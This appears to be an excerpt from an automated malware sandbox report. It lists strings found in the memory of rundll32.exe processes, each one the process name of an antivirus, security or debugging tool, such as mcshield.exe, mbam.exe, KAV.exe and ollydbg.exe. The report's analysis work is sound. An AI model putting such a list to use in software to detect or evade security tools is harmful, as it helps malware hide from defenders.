    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vsmon.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Rtvscan.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tnbutil.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSMB32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsma32.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsav530stbyb.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: livesrv.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FCH32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCFService.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461916716.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PSIMSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862490782.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ONLNSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fch32.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashServ.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mbam.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ollydbg.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DRWEB32W.EXE
    Source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163887034.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: alsvc.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GDFwSvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KAV.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ashwebsv.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSGK32ST.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089140201.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461916716.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387106733.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PavBckPT.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSAV32.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgas.exe
